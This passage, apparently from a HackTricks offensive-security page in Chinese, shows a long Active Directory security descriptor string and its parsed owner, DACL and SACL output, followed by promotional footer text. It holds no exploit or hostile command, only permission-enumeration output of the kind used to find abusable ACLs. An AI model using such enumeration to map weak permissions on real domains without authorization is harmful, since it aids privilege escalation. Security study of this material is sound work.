9050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
Owner            : BUILTIN\Administrators
Group            : BUILTIN\Administrators
DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
WriteExtendedAttributes)...}
SystemAcl        : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
(Traverse)...}
RawDescriptor    : System.Security.AccessControl.CommonSecurityDescriptor

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家 网络安全公司 工作吗？你想在 HackTricks 中看到你的 公司广告吗？或者你想获得 PEASS 的最新版本或下载 HackTricks 的 PDF 吗？请查看 订阅计划！
• 发现我们的独家 NFTs 集合 The PEASS Family
• 获取 官方 PEASS & HackTricks 商品
• 加入 💬 Discord 群组 或 电报群组 或 关注 我的 Twitter 🐦@carlospolopm.
• 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。